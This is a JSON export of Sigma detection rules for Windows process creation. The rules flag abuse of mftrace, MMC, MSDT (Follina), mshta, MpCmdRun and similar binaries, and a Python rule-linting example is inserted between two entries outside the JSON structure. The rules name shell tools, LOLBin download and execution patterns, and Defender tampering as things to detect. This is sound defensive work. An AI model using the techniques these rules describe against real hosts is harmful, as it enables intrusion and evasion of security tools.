    "content": "title: Potential Mftrace.EXE Abuse\nid: 3d48c9d3-1aa6-418d-98d3-8fd3c01a564e\nstatus: test\ndescription: Detects child processes of the \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) which can abused to execute arbitrary binaries.\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-09\nmodified: 2023-08-03\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\mftrace.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use for tracing purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mmc_default_domain_gpo_modification_via_gpme.yml",
    "content": "title: Windows Default Domain GPO Modification via GPME\nid: dcff7e85-d01f-4eb5-badd-84e2e6be8294\nrelated:\n    - id: e5ac86dd-2da1-454b-be74-05d26c769d7d\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the use of the Group Policy Management Editor (GPME) to modify Default Domain or Default Domain Controllers Group Policy Objects (GPOs).\n    Adversaries may leverage GPME to make stealthy changes in these default GPOs to deploy malicious GPOs configurations across the domain without raising suspicion.\nreferences:\n    - https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html\n    - https://adsecurity.org/?p=3377\n    - https://sdmsoftware.com/general-stuff/launching-the-new-gp-management-editor-from-the-command-line/\n    - https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/\nauthor: TropChaud\ndate: 2025-11-22\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1484.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    # \"C:\\Windows\\System32\\gpme.msc\" /s /gpobject:\"LDAP://<REDACTED>/cn<REDACTED>,cnpolicies,cnsystem,DC<REDACTED>,DClocal\"\n    selection_mmc:\n        - Image|endswith: '\\mmc.exe'\n        - OriginalFileName: 'MMC.exe'\n    selection_gpme:\n        CommandLine|contains|all:\n            - 'gpme.msc'\n            - 'gpobject:'\n    selection_default_gpos:\n        CommandLine|contains:\n            - '31B2F340-016D-11D2-945F-00C04FB984F9' # Default Domain Policy GUID\n            - '6AC1786C-016F-11D2-945F-00C04FB984F9' # Default Domain Controllers Policy GUID\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of GPME to modify GPOs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml",
    "content": "title: MMC20 Lateral Movement\nid: f1f3bf22-deb2-418d-8cce-e1a45e46a5bd\nstatus: test\ndescription: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe\nreferences:\n    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing\nauthor: '@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)'\ndate: 2020-03-04\nmodified: 2021-11-27\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        Image|endswith: '\\mmc.exe'\n        CommandLine|contains: '-Embedding'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mmc_rlo_abuse_pattern.yml",
    "content": "title: MMC Executing Files with Reversed Extensions Using RTLO Abuse\nid: 9cfe4b27-1e56-48b4-b7a8-d46851c91a44\nstatus: experimental\ndescription: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.\nreferences:\n    - https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf\n    - https://en.wikipedia.org/wiki/Right-to-left_override\n    - https://tria.ge/241015-l98snsyeje/behavioral2\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - attack.defense-evasion\n    - attack.t1218.014\n    - attack.t1036.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        - Image|endswith: '\\mmc.exe'\n        - OriginalFileName: 'MMC.exe'\n    selection_commandline:\n        CommandLine|contains: # While looking at these files the prefix of their name will look something like csm.pdf, but in reality it is msc file\n            - 'cod.msc'  # Reversed `.doc`\n            - 'fdp.msc'  # Reversed `.pdf`\n            - 'ftr.msc'  # Reversed `.rtf`\n            - 'lmth.msc'  # Reversed `.html`\n            - 'slx.msc'  # Reversed `.xls`\n            - 'tdo.msc'  # Reversed `.odt`\n            - 'xcod.msc'  # Reversed `.docx`\n            - 'xslx.msc'  # Reversed `.xlsx`\n            - 'xtpp.msc'  # Reversed `.pptx`\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrative actions using MMC to execute misnamed `.msc` files.\n    - Unconventional but non-malicious usage of RLO or reversed extensions.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml",
    "content": "title: MMC Spawning Windows Shell\nid: 05a2ab7e-ce11-4b63-86db-ab32e763e11d\nstatus: test\ndescription: Detects a Windows command line executable started from MMC\nreferences:\n    - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/\nauthor: Karneades, Swisscom CSIRT\ndate: 2019-08-05\nmodified: 2022-07-14\ntags:\n    - attack.lateral-movement\n    - attack.t1021.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        ParentImage|endswith: '\\mmc.exe'\n    selection2:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wscript.exe'\n              - '\\cscript.exe'\n              - '\\sh.exe'\n              - '\\bash.exe'\n              - '\\reg.exe'\n              - '\\regsvr32.exe'\n        - Image|contains: '\\BITSADMIN'\n    condition: all of selection*\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mode_codepage_russian.yml",
    "content": "title: CodePage Modification Via MODE.COM To Russian Language\nid: 12fbff88-16b5-4b42-9754-cd001a789fb3\nrelated:\n    - id: d48c5ffa-3b02-4c0f-9a9e-3c275650dd0e\n      type: derived\nstatus: test\ndescription: |\n    Detects a CodePage modification using the \"mode.com\" utility to Russian language.\n    This behavior has been used by threat actors behind Dharma ransomware.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode\n    - https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html\n    - https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-01-17\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # VT Query: behavior:\"mode con cp select=1251\"\n    # VT Query: behavior:\"mode con cp select=866\"\n    selection_img:\n        - Image|endswith: '\\mode.com'\n        - OriginalFileName: 'MODE.COM'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' con '\n            - ' cp '\n            - ' select='\n        CommandLine|endswith:\n            - '=1251' # ANSI Cyrillic; Cyrillic (Windows) - Observed ITW by Dharma ransomware\n            - '=866' # OEM Russian; Cyrillic (DOS) - Observed ITW by other malware\n    condition: all of selection_*\nfalsepositives:\n    - Russian speaking people changing the CodePage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mofcomp_execution.yml",
    "content": "title: Potential Suspicious Mofcomp Execution\nid: 1dd05363-104e-4b4a-b963-196a534b03a1\nstatus: test\ndescription: |\n    Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline.\n    The \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\n    Attackers abuse this utility to install malicious MOF scripts\nreferences:\n    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\n    - https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml\n    - https://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-12\nmodified: 2023-04-11\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mofcomp.exe'\n        - OriginalFileName: 'mofcomp.exe'\n    selection_case:\n        - ParentImage|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wsl.exe'\n              - '\\wscript.exe'\n              - '\\cscript.exe'\n        - CommandLine|contains:\n              - '\\AppData\\Local\\Temp'\n              - '\\Users\\Public\\'\n              - '\\WINDOWS\\Temp\\'\n              - '%temp%'\n              - '%tmp%'\n              - '%appdata%'\n    filter_main_wmiprvse:\n        ParentImage: 'C:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n        CommandLine|contains: 'C:\\Windows\\TEMP\\'\n        CommandLine|endswith: '.mof'\n    filter_optional_null_parent:\n        # Sometimes the parent information isn't available from the Microsoft-Windows-Security-Auditing provider.\n        CommandLine|contains: 'C:\\Windows\\TEMP\\'\n        
CommandLine|endswith: '.mof'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml",
    "content": "title: Potential Mpclient.DLL Sideloading Via Defender Binaries\nid: 7002aa10-b8d4-47ae-b5ba-51ab07e228b9\nrelated:\n    - id: 418dc89a-9808-4b87-b1d7-e5ae0cb6effc\n      type: similar\nstatus: test\ndescription: Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.\nreferences:\n    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool\nauthor: Bhabesh Raj\ndate: 2022-08-01\nmodified: 2023-08-04\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '\\MpCmdRun.exe'\n            - '\\NisSrv.exe'\n    filter_main_known_locations:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Windows Defender\\'\n            - 'C:\\Program Files\\Microsoft Security Client\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n            - 'C:\\Windows\\WinSxS\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml",
    "content": "title: File Download Via Windows Defender MpCmpRun.EXE\nid: 46123129-1024-423e-9fae-43af4a0fa9a5\nstatus: test\ndescription: Detects the use of Windows Defender MpCmdRun.EXE to download files\nreferences:\n    - https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866\n    - https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/\nauthor: Matthew Matchen\ndate: 2020-09-04\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'MpCmdRun.exe'\n        - Image|endswith: '\\MpCmdRun.exe'\n        - CommandLine|contains: 'MpCmdRun.exe'\n        - Description: 'Microsoft Malware Protection Command Line Utility'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'DownloadFile'\n            - 'url'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml",
    "content": "title: Windows Defender Definition Files Removed\nid: 9719a8aa-401c-41af-8108-ced7ec9cd75c\nstatus: test\ndescription: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\nauthor: frack113\ndate: 2021-07-07\nmodified: 2023-07-18\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\MpCmdRun.exe'\n        - OriginalFileName: MpCmdRun.exe\n    selection_cli:\n        CommandLine|contains|all:\n            - ' -RemoveDefinitions'\n            - ' -All'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml",
    "content": "title: Suspicious Msbuild Execution By Uncommon Parent Process\nid: 33be4333-2c6b-44f4-ae28-102cdbde0a31\nstatus: test\ndescription: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process\nreferences:\n    - https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/\n    - https://www.echotrail.io/insights/search/msbuild.exe\nauthor: frack113\ndate: 2022-11-17\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\MSBuild.exe'\n        - OriginalFileName: 'MSBuild.exe'\n    filter_parent:\n        ParentImage|endswith:\n            - '\\devenv.exe'\n            - '\\cmd.exe'\n            - '\\msbuild.exe'\n            - '\\python.exe'\n            - '\\explorer.exe'\n            - '\\nuget.exe'\n    condition: selection and not filter_parent\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msdt_answer_file_exec.yml",
    "content": "title: MSDT Execution Via Answer File\nid: 9c8c7000-3065-44a8-a555-79bcba5d9955\nstatus: test\ndescription: |\n    Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab).\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Msdt/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-13\nmodified: 2025-10-29\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msdt.exe'\n        CommandLine|contains: '\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml'\n        CommandLine|contains|windash: ' -af '\n    filter_main_pcwrun:\n        ParentImage|endswith: '\\pcwrun.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Possible undocumented parents of \"msdt\" other than \"pcwrun\".\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml",
    "content": "title: Potential Arbitrary Command Execution Using Msdt.EXE\nid: 258fc8ce-8352-443a-9120-8a11e4857fa5\nstatus: test\ndescription: Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability\nreferences:\n    - https://twitter.com/nao_sec/status/1530196847679401984\n    - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/\n    - https://twitter.com/_JohnHammond/status/1531672601067675648\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-29\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msdt.exe'\n        - OriginalFileName: 'msdt.exe'\n    selection_cmd_inline:\n        CommandLine|contains: 'IT_BrowseForFile='\n    selection_cmd_answerfile_flag:\n        CommandLine|contains: ' PCWDiagnostic'\n    selection_cmd_answerfile_param:\n        CommandLine|contains|windash: ' -af '\n    condition: selection_img and (selection_cmd_inline or all of selection_cmd_answerfile_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml",
    "content": "title: Suspicious Cabinet File Execution Via Msdt.EXE\nid: dc4576d4-7467-424f-9eee-fd2b02855fe0\nrelated:\n    - id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3\n      type: obsolete\nstatus: test\ndescription: Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190\nreferences:\n    - https://twitter.com/nas_bench/status/1537896324837781506\n    - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab\n    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0\n    - https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd\nauthor: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113\ndate: 2022-06-21\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msdt.exe'\n        - OriginalFileName: 'msdt.exe'\n    selection_cmd:\n        CommandLine|contains|windash: ' -cab '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of \".diagcab\" files\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml",
    "content": "title: Suspicious MSDT Parent Process\nid: 7a74da6b-ea76-47db-92cc-874ad90df734\nstatus: test\ndescription: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation\nreferences:\n    - https://twitter.com/nao_sec/status/1530196847679401984\n    - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/\nauthor: Nextron Systems\ndate: 2022-06-01\nmodified: 2023-02-06\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\schtasks.exe'\n            - '\\wmic.exe'\n            - '\\wscript.exe'\n            - '\\wsl.exe'\n            # Note: office applications are covered by: 438025f9-5856-4663-83f7-52f878a70a50\n    selection_msdt:\n        - Image|endswith: '\\msdt.exe'\n        - OriginalFileName: 'msdt.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msedge_proxy_download.yml",
    "content": "title: Arbitrary File Download Via MSEDGE_PROXY.EXE\nid: e84d89c4-f544-41ca-a6af-4b92fd38b023\nstatus: test\ndescription: Detects usage of \"msedge_proxy.exe\" to download arbitrary files\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\msedge_proxy.exe'\n        - OriginalFileName: 'msedge_proxy.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_http.yml",
    "content": "title: Remotely Hosted HTA File Executed Via Mshta.EXE\nid: b98d0db6-511d-45de-ad02-e82a98729620\nstatus: test\ndescription: Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file\nreferences:\n    - https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-08\nmodified: 2023-02-06\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mshta.exe'\n        - OriginalFileName: 'MSHTA.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n            - 'ftp://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml",
    "content": "title: Wscript Shell Run In CommandLine\nid: 2c28c248-7f50-417a-9186-a85b223010ee\nstatus: test\ndescription: Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity\nreferences:\n    - https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html\n    - https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-31\nmodified: 2023-05-15\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'Wscript.'\n            - '.Shell'\n            - '.Run'\n    condition: selection\nfalsepositives:\n    - Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_javascript.yml",
    "content": "title: Suspicious JavaScript Execution Via Mshta.EXE\nid: 67f113fa-e23d-4271-befa-30113b3e08b1\nstatus: test\ndescription: Detects execution of javascript code using \"mshta.exe\".\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2023-02-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mshta.exe'\n        - OriginalFileName: 'MSHTA.EXE'\n    selection_cli:\n        CommandLine|contains: 'javascript'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml",
    "content": "title: Potential LethalHTA Technique Execution\nid: ed5d72a6-f8f4-479d-ba79-02f6a80d7471\nstatus: test\ndescription: Detects potential LethalHTA technique where the \"mshta.exe\" is spawned by an \"svchost.exe\" process\nreferences:\n    - https://codewhitesec.blogspot.com/2018/07/lethalhta.html\nauthor: Markus Neis\ndate: 2018-06-07\nmodified: 2023-02-07\ntags:\n    - attack.defense-evasion\n    - attack.t1218.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        Image|endswith: '\\mshta.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_susp_child_processes.yml",
    "content": "title: Suspicious MSHTA Child Process\nid: 03cc0c25-389f-4bf8-b48d-11878079f1ca\nstatus: test\ndescription: Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution\nreferences:\n    - https://www.trustedsec.com/july-2015/malicious-htas/\nauthor: Michael Haag\ndate: 2019-01-16\nmodified: 2023-02-06\ntags:\n    - attack.defense-evasion\n    - attack.t1218.005\n    - car.2013-02-003\n    - car.2013-03-001\n    - car.2014-04-003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\mshta.exe'\n    selection_child:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wscript.exe'\n              - '\\cscript.exe'\n              - '\\sh.exe'\n              - '\\bash.exe'\n              - '\\reg.exe'\n              - '\\regsvr32.exe'\n              - '\\bitsadmin.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'wscript.exe'\n              - 'cscript.exe'\n              - 'Bash.exe'\n              - 'reg.exe'\n              - 'REGSVR32.EXE'\n              - 'bitsadmin.exe'\n    condition: all of selection*\nfalsepositives:\n    - Printer software / driver installations\n    - HP software\nlevel: high\n"
  },
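Conditions in these rules address blocks either by name (`selection and not filter`) or by wildcard (`all of selection*` in the MSHTA child-process rule above, `1 of filter_optional_*` elsewhere), and many of them match on `OriginalFileName`, the file name recorded in the PE version resource. The Python block below is an added example, not part of the Sigma repository or its validation tooling: a small lint that parses the `detection:` section with an indentation-based approximation of this repository's layout (no YAML library), checks that every identifier and wildcard in `condition` resolves to a block, and flags an `OriginalFileName` value that begins with a backslash, which can never match because that field carries no path. The three rules it runs on are constructed for the example and are not copies of repository rules.

```python
# Added example, not code from the Sigma project: a lint over rule text that
# checks condition references and OriginalFileName values. The parser is an
# indentation-based approximation of this repository's rule layout, not YAML.
import fnmatch
import re

QUANT_RE = re.compile(r"\b(?:all|\d+)\s+of\s+(\S+)")   # 'all of x*', '1 of y'
IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_*]*")
KEYWORDS = {"and", "or", "not"}


def detection_blocks(rule_text):
    """Return (block names, condition) from the keys directly under detection:."""
    names, condition, inside = [], None, False
    for line in rule_text.splitlines():
        if line.startswith("detection:"):
            inside = True
            continue
        if inside and line and not line.startswith(" "):
            inside = False                        # next top-level key reached
        if not inside:
            continue
        m = re.match(r"^    (\w+):(.*)$", line)   # exactly four spaces deep
        if not m:
            continue                              # deeper field lines
        key, rest = m.group(1), m.group(2).strip()
        if key == "condition":
            condition = rest
        else:
            names.append(key)
    return names, condition


def check_condition(names, condition):
    """Every wildcard and bare identifier must resolve to a detection block."""
    problems = []
    for pattern in QUANT_RE.findall(condition):
        pattern = pattern.rstrip(")")
        if pattern != "them" and not any(fnmatch.fnmatchcase(n, pattern) for n in names):
            problems.append(f"'{pattern}' matches no detection block")
    for ident in IDENT_RE.findall(QUANT_RE.sub(" ", condition)):
        if ident not in KEYWORDS and ident not in names:
            problems.append(f"'{ident}' is not a detection block")
    return problems


def original_filenames(rule_text):
    """Yield OriginalFileName values, written inline or as a list under the key."""
    lines = rule_text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^(\s*)-?\s*OriginalFileName:\s*(.*)$", line)
        if not m:
            continue
        indent, rest = len(m.group(1)), m.group(2).strip()
        if rest:
            yield rest.strip("'\"")
            continue
        for follow in lines[i + 1:]:
            item = re.match(r"^(\s*)-\s*(.*)$", follow)
            if not item or len(item.group(1)) <= indent:
                break
            yield item.group(2).strip().strip("'\"")


def lint(rule_text):
    names, condition = detection_blocks(rule_text)
    problems = check_condition(names, condition) if condition is not None else ["no condition"]
    # OriginalFileName comes from the PE version resource and never holds a path.
    problems.extend(f"OriginalFileName {v!r} starts with a path separator"
                    for v in original_filenames(rule_text) if v.startswith("\\"))
    return problems


# Constructed rules for the example (abridged; not copies of repository rules).
RULE_OK = r"""
title: Constructed child-process rule with a wildcard condition
detection:
    selection_parent:
        ParentImage|endswith: '\mshta.exe'
    selection_child:
        - Image|endswith: '\cmd.exe'
        - OriginalFileName:
              - 'Cmd.Exe'
              - 'PowerShell.EXE'
    condition: all of selection*
level: high
"""

RULE_BAD_FILENAME = r"""
title: Constructed rule with a path in OriginalFileName
detection:
    selection:
        - Image|endswith: '\msiexec.exe'
        - OriginalFileName: '\msiexec.exe'
    filter:
        Image|startswith: 'C:\Windows\System32\'
    condition: selection and not filter
level: high
"""

RULE_BAD_CONDITION = r"""
title: Constructed rule whose condition names a missing filter
detection:
    selection_img:
        Image|endswith: '\mstsc.exe'
    selection_cli:
        CommandLine|contains|windash: ' /v:'
    condition: all of selection_* and not 1 of filter_optional_*
level: medium
"""

if __name__ == "__main__":
    for name in ("RULE_OK", "RULE_BAD_FILENAME", "RULE_BAD_CONDITION"):
        print(name, lint(globals()[name]) or "clean")
```

`lint` returns an empty list for the first rule, one finding for the `\msiexec.exe` value in the second, and one for the unresolved `filter_optional_*` wildcard in the third. The same check applied to the rules on this page is what catches an `OriginalFileName` written with a leading backslash.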
  {
    "path": "rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml",
